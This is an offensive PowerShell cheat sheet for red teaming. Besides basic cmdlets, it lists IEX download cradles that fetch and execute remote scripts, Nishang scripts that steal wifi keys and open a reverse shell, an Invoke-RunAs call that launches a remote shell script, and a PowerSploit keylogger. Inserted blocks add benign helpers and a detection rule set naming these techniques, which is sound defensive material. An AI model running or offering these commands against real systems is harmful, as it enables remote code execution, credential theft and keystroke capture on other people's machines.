d4Rk's 1337 h4x0r guide
PowerShell


Last updated 3 years ago

Basic commands

Help

Get-Help <command> -Detailed

Display all properties

<command> | Select-Object -Property *
<command> | Select *

Get file contents (like type or cat; on Windows both are aliases of Get-Content)

Get-Content <file>

Delete a directory recursively

Remove-Item -Recurse -Force <dir>

Write output to file

<command> | Out-File <file>

Count

(<command>).Count

Measures (Count, Avg, etc.)

<command> | Measure-Object

Whoami

whoami /all

-> SeImpersonatePrivilege (Potato exploits, PrintSpoofer, etc.)

Download file

IEX(New-Object Net.WebClient).downloadString('<url>')

or

IEX(IWR('<url>'))

Check architecture

[environment]::Is64BitOperatingSystem
[environment]::Is64BitProcess

64bit PowerShell path (from a 32-bit process on 64-bit Windows; SysNative is a file-system redirector alias that only exists for 32-bit processes, a 64-bit process uses C:\Windows\System32 directly)

C:\Windows\SysNative\WindowsPowerShell\v1.0\PowerShell
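Added example (not part of the original cheat sheet): a helper that combines the two architecture checks above and picks the right PowerShell binary, handling the WOW64 edge case where SysNative is the only way to reach the 64-bit binary. The function name is an assumption.

```powershell
# Added example, not from the original cheat sheet. Picks the native 64-bit
# PowerShell binary when the current process is a 32-bit process on 64-bit
# Windows. The SysNative alias only exists for 32-bit (WOW64) processes; a
# 64-bit process must use System32 directly. Function name is an assumption.
function Get-NativePowerShellPath {
    [CmdletBinding()]
    param()

    $is64Os   = [Environment]::Is64BitOperatingSystem
    $is64Proc = [Environment]::Is64BitProcess
    $winDir   = $env:SystemRoot   # e.g. C:\Windows

    if ($is64Os -and -not $is64Proc) {
        # 32-bit process on a 64-bit OS: System32 is redirected to SysWOW64,
        # so SysNative is the only path that reaches the real 64-bit binary.
        $path = Join-Path $winDir 'SysNative\WindowsPowerShell\v1.0\powershell.exe'
    } else {
        # Native 64-bit process, or a 32-bit OS: System32 is the real directory.
        $path = Join-Path $winDir 'System32\WindowsPowerShell\v1.0\powershell.exe'
    }

    [PSCustomObject]@{
        Is64BitOS      = $is64Os
        Is64BitProcess = $is64Proc
        Wow64          = ($is64Os -and -not $is64Proc)
        PowerShellPath = $path
        Exists         = Test-Path -LiteralPath $path
    }
}

# Usage: show which binary this session would hand off to.
Get-NativePowerShellPath | Format-List
```

Run it once from a 32-bit host process and once from a 64-bit one on the same machine: the Wow64 flag flips and the path changes between SysNative and System32, while Exists stays True in both cases because the redirector resolves SysNative for the 32-bit process.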

Base64 encode file

# Get-Content returns an array of lines with the line endings stripped, so encoding
# that output corrupts binaries and alters text files; read the raw bytes instead
$fe = [System.IO.File]::ReadAllBytes((Resolve-Path "filename").Path)
[System.Convert]::ToBase64String($fe)
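Added example (not part of the original cheat sheet): a Base64 encode/decode round trip with a SHA256 integrity check, which also shows why the file has to be read as raw bytes. Function names, the temp directory and the sample file contents are constructed for the demo.

```powershell
# Added example, not from the original cheat sheet. Shows why a file must be
# read as raw bytes before Base64 encoding: Get-Content splits on line
# endings and PowerShell re-joins the lines with spaces, so the decoded copy
# no longer matches. Function and file names are assumptions for the demo.

function ConvertTo-Base64File {
    param([Parameter(Mandatory)][string]$Path)
    # ReadAllBytes preserves every byte, binary or text, CRLF included.
    $bytes = [System.IO.File]::ReadAllBytes((Resolve-Path -LiteralPath $Path).Path)
    [System.Convert]::ToBase64String($bytes)
}

function ConvertFrom-Base64File {
    param(
        [Parameter(Mandatory)][string]$Base64,
        [Parameter(Mandatory)][string]$OutPath
    )
    $bytes = [System.Convert]::FromBase64String($Base64)
    [System.IO.File]::WriteAllBytes($OutPath, $bytes)
    # Return the hash so the caller can verify the transfer end to end.
    Get-FileHash -LiteralPath $OutPath -Algorithm SHA256
}

# Constructed test input: a small file containing CRLF, a NUL byte and a
# non-ASCII byte, i.e. content that line-oriented reading mangles.
$work = Join-Path $env:TEMP 'b64demo'
New-Item -ItemType Directory -Path $work -Force | Out-Null
$src  = Join-Path $work 'input.bin'
[byte[]]$sample = 0x48, 0x69, 0x0D, 0x0A, 0x00, 0xFF, 0x0D, 0x0A
[System.IO.File]::WriteAllBytes($src, $sample)
$hashSrc = Get-FileHash -LiteralPath $src -Algorithm SHA256

# Correct path: raw bytes -> Base64 -> bytes; the hash matches the source.
$b64     = ConvertTo-Base64File -Path $src
$copy    = Join-Path $work 'copy.bin'
$hashOut = ConvertFrom-Base64File -Base64 $b64 -OutPath $copy
"Raw-bytes round trip intact: $($hashOut.Hash -eq $hashSrc.Hash)"

# The line-based approach (Get-Content, then UTF8.GetBytes) loses the line
# endings and re-encodes the NUL/0xFF bytes, so the hash differs.
$textBased = [System.Convert]::ToBase64String(
    [System.Text.Encoding]::UTF8.GetBytes((Get-Content -LiteralPath $src)))
$badCopy = Join-Path $work 'bad.bin'
$hashBad = ConvertFrom-Base64File -Base64 $textBased -OutPath $badCopy
"Line-based round trip intact: $($hashBad.Hash -eq $hashSrc.Hash)"
```

The first line prints True and the second False. Comparing Get-FileHash output on both ends is the quickest way to confirm a Base64 transfer arrived intact before relying on the file.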

Nishang

Gather information

powershell -ExecutionPolicy bypass -file Get-Information.ps1 > results.txt

Get wifi creds

.\Get-WLAN-Keys.ps1

Reverse shell

/usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1

-> Append `Invoke-PowerShellTcp -Reverse -IPAddress <ip> -Port <port>` to the end of Invoke-PowerShellTcp.ps1 so the shell runs automatically when the script is loaded

Remote execution

powershell IEX (New-Object System.Net.WebClient).DownloadString('http://<ip>/Invoke-PowerShellTcp.ps1')
powershell -NoProfile -ExecutionPolicy unrestricted -Command IEX (New-Object System.Net.WebClient).DownloadString('http://<ip>/Invoke-PowerShellTcp.ps1')

PowerShell-Suite

Invoke-RunAs.ps1
Invoke-RunAs -User Administrator -Password <pw> -LogonType 0x1 -Binary c:\Windows\SysNative\WindowsPowerShell\v1.0\PowerShell.exe -Args "IEX(New-Object Net.WebClient).downloadString('http://<ip>/shell.ps1')"

-> Append this call to the bottom of Invoke-RunAs.ps1 if it does not work otherwise

Keylogger

IEX (New-Object Net.WebClient).DownloadString('https://raw.github.com/mattifestation/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')
Get-Keystrokes -LogPath C:\key.log -CollectionInterval 1
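Added example (not part of the original cheat sheet) from the defender's side: a small rule set that flags the commands listed in the Download file, Nishang and Keylogger sections when they show up in PowerShell script block logs (Event ID 4104 in Microsoft-Windows-PowerShell/Operational). The rule names, the function name and the sample log entries are constructed for the demo.

```powershell
# Added example, not from the original cheat sheet: detection-side check that
# flags the techniques on this page in PowerShell script block logs (Event ID
# 4104, Microsoft-Windows-PowerShell/Operational). Rule names, function name
# and the sample entries below are constructed for the demo.

$Rules = @(
    @{ Name = 'DownloadCradle';      Pattern = '(?i)\b(IEX|Invoke-Expression)\b.*\b(DownloadString|DownloadFile|Invoke-WebRequest|IWR)\b' }
    @{ Name = 'PolicyBypass';        Pattern = '(?i)-ExecutionPolicy\s+(bypass|unrestricted)' }
    @{ Name = 'NishangReverseShell'; Pattern = '(?i)Invoke-PowerShellTcp\b' }
    @{ Name = 'Keylogger';           Pattern = '(?i)Get-Keystrokes\b' }
    @{ Name = 'RunAsWithPassword';   Pattern = '(?i)Invoke-RunAs\b.*-Password\b' }
)

function Find-SuspiciousScriptBlock {
    param(
        [Parameter(Mandatory, ValueFromPipeline)][string]$ScriptBlockText
    )
    process {
        # Collect the names of every rule whose pattern matches this entry.
        $hits = foreach ($r in $Rules) {
            if ($ScriptBlockText -match $r.Pattern) { $r.Name }
        }
        if ($hits) {
            [PSCustomObject]@{
                Rules   = ($hits -join ',')
                Snippet = $ScriptBlockText.Substring(0, [Math]::Min(70, $ScriptBlockText.Length))
            }
        }
    }
}

# Constructed sample script-block texts, as they would appear in 4104 events.
# The first three mirror commands from this page; the last two are benign.
$samples = @(
    "IEX(New-Object Net.WebClient).downloadString('http://10.0.0.5/x.ps1')",
    "powershell -NoProfile -ExecutionPolicy unrestricted -Command IEX (New-Object System.Net.WebClient).DownloadString('http://10.0.0.5/Invoke-PowerShellTcp.ps1')",
    "Get-Keystrokes -LogPath C:\key.log -CollectionInterval 1",
    "Get-ChildItem C:\Users | Measure-Object",
    "Get-Content .\report.txt | Out-File .\copy.txt"
)

$samples | Find-SuspiciousScriptBlock | Format-Table -AutoSize

# Against the live log (script block logging must be enabled via policy);
# Properties[2] of a 4104 event is the ScriptBlockText field.
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } |
#     ForEach-Object { $_.Properties[2].Value } | Find-SuspiciousScriptBlock
```

The three offensive samples come back tagged (the second one with both DownloadCradle, PolicyBypass and NishangReverseShell), the two benign ones produce no output. Script block logging records the decoded text even when the command arrived Base64-encoded or through a cradle, which is why it is the right log to run these rules against.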

Links

GitHub - samratashok/nishang: "Offensive PowerShell for red team, penetration testing and offensive security."
GitHub - FuzzySecurity/PowerShell-Suite: "This is a collection of PowerShell utilities I put together either for fun or because I had a narrow application in mind."
RedTeam_CheatSheet.ps1 · GitHub